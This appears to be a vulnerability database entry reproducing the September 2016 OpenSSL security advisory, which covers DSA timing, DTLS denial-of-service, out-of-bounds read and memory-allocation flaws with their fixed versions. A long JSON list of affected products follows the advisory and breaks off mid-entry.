Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0031", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center enterprise live data server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "project openssl 1.0.2i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "nexus intercloud for vmware", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.2.1.1" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.1" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "small business spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "11.1" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "13" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": 